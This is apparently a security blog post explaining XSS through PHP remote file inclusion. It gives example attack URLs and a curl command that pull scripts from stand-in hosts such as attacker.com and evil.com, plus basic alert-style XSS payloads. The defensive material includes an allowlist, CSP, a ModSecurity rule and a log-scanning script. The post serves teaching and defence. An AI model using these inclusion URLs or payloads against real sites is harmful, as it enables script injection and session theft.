XSS via Remote File Inclusion Vulnerability

A security researcher demonstrated a Cross-Site Scripting (XSS) attack via Remote File Inclusion (RFI) by injecting malicious JavaScript through an external URL parameter:

https://example/index.php?site=<external_url>

The payload was hosted on GitHub, triggering an alert when executed. This vulnerability occurs when a web application dynamically includes external files without proper validation.

You Should Know:

1. Exploiting RFI to XSS

Attackers can abuse RFI to load malicious scripts:

https://vulnerable-site.com/page.php?file=https://attacker.com/malicious.js

2. Testing for RFI/XSS

Use curl to check if a site includes external files:

curl -v "http://example.com/index.php?site=http://evil.com/payload.js"

3. Preventing RFI & XSS

  • Input Validation (allowlist the include target instead of trusting user input):
    $allowed_sites = ["home.php", "about.php"];
    // strict comparison: only an exact, listed filename is ever included
    if (in_array($_GET['site'] ?? '', $allowed_sites, true)) {
        include($_GET['site']);
    }
    
  • Use `allow_url_include=Off` in php.ini.
  • Content Security Policy (CSP):
    <meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'self'">
    

4. Manual XSS Payload Testing

<script>alert(document.domain)</script> 
<img src=x onerror=alert(1)> 

5. Automated Scanning with Tools

  • Burp Suite (Intercept & modify requests)
  • OWASP ZAP (Automated XSS scanning)
  • XSS Hunter (Blind XSS detection)

6. Server-Side Protections

  • ModSecurity Rules:
    SecRule ARGS "@rx \b(https?|ftp)://" "id:100,phase:2,deny,status:403,log,msg:'Remote File Inclusion Attempt'"
    

What Undercode Says:

Remote File Inclusion (RFI) leading to XSS remains a critical web vulnerability. Attackers exploit weak input validation to inject malicious scripts, compromising user sessions. Always:
– Disable remote file includes in PHP (allow_url_include=0).
– Use CSP headers to restrict script sources.
– Employ WAFs (like Cloudflare or ModSecurity) to block RFI/XSS attempts.

Linux Command for Log Analysis:

grep -Ei '[?&][a-z0-9_]+=(https?|ftp)(://|%3a%2f%2f)' /var/log/apache2/access.log
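A more thorough version of the log check above, added here as an example (it is not code from the original post): it parses each Apache access-log request line, URL-decodes every query parameter, and flags values that resolve to a remote `http`, `https` or `ftp` URL, including percent-encoded ones that a plain text grep misses. The log lines are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample lines in Apache combined log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2025:12:00:01 +0000] "GET /index.php?site=about.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2025:12:00:02 +0000] "GET /index.php?site=https://attacker.example/malicious.js HTTP/1.1" 200 88 "-" "curl/8.0"
203.0.113.9 - - [10/Mar/2025:12:00:03 +0000] "GET /page.php?file=http%3A%2F%2Fevil.example%2Fpayload.js HTTP/1.1" 200 88 "-" "curl/8.0"
203.0.113.11 - - [10/Mar/2025:12:00:04 +0000] "GET /search.php?q=hello%20world HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Combined format: client IP, identity, user, [timestamp], "METHOD target PROTOCOL", ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*"'
)

# Same scheme set as the ModSecurity rule in this post; matched after decoding.
REMOTE_SCHEME_RE = re.compile(r'^(https?|ftp)://', re.IGNORECASE)


def find_rfi_attempts(log_text: str) -> list[dict]:
    """Return one finding per query parameter whose decoded value is a remote URL."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable request line; skip rather than guess
        query = urlsplit(m.group("target")).query
        # parse_qsl percent-decodes once; a second unquote also catches double-encoded values
        for name, value in parse_qsl(query, keep_blank_values=True):
            decoded = unquote(value)
            if REMOTE_SCHEME_RE.match(decoded):
                findings.append({
                    "ip": m.group("ip"),
                    "time": m.group("ts"),
                    "param": name,
                    "value": decoded,
                })
    return findings


if __name__ == "__main__":
    for f in find_rfi_attempts(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} param={f['param']} -> {f['value']}")
```

To run it against a real server, pass the contents of /var/log/apache2/access.log to `find_rfi_attempts` instead of `SAMPLE_LOG`.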

Windows Command for URL Validation:

(Invoke-WebRequest "http://example.com/?param=test").Content -match 'alert\(' 

Expected Output:

A secure web application should never reflect unsanitized input or allow arbitrary remote file inclusion. Implement strict whitelisting and monitor logs for exploitation attempts.

Prediction:

As web apps increasingly rely on dynamic content, RFI-based XSS attacks will rise. Developers must adopt stricter CSP policies and automated security testing to mitigate risks.

References:

Reported By: Shivangmauryaa Bounty – Hackers Feeds